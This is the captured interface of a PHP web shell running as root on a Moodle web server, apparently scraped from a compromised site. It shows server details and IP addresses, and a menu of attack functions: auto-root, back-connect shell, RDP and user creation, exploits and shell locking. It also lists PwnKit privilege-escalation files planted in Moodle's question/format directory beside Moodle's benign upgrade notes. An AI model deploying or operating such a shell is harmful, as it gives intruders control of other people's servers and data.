Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
question /
format /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
aiken
[ DIR ]
drwxrwxrwx
blackboard_six
[ DIR ]
drwxrwxrwx
examview
[ DIR ]
drwxrwxrwx
gift
[ DIR ]
drwxrwxrwx
missingword
[ DIR ]
drwxrwxrwx
multianswer
[ DIR ]
drwxrwxrwx
webct
[ DIR ]
drwxrwxrwx
xhtml
[ DIR ]
drwxrwxrwx
xml
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
README.txt
597
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
upgrade.txt
1.63
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upgrade.txt
This files describes API changes for question import/export format plugins. === 3.6 === * Saving question category descriptions (info) is now supported in Moodle XML import/export format. New xml-structure snippet for a question category: <question type="category"> <category> <text>${$contexttypename}$/{$category_path}</text> </category> <info format="{$format}"> <text>{$info_categorydescription}</text> </info> </question> * The method importprocess() in question/format.php no longer accepts $category as a parameter. If required in a plugin then please override this method. === 2.3 === * This plugin type now supports cron in the standard way. If required, Create a lib.php file containing function qformat_mypluginname_cron() {}; === 2.1.5 / 2.2.3 / 2.3 === * The readquestions method used to take a second argument $context. However, at the point where this method was called, it was impossible to know what context the quetsions were going to be saved into, so the value could be wrong. Also, none of the standard question formats were using this argument, so it was removed. See MDL-32220. === 2.2 === * The plugin name used to be defined in a string called the same thing as the format, with assoicated help strings, for example: $string['aiken'] = 'Aiken format'; $string['aiken_help'] = 'This is a simple format ...'; $string['aiken_link'] = 'qformat/aiken'; This needs to be changed to use the standard string name pluginname, as for other plugin types. $string['pluginname'] = 'Aiken format'; $string['pluginname_help'] = 'This is a simple format ...'; $string['pluginname_link'] = 'qformat/aiken';
Close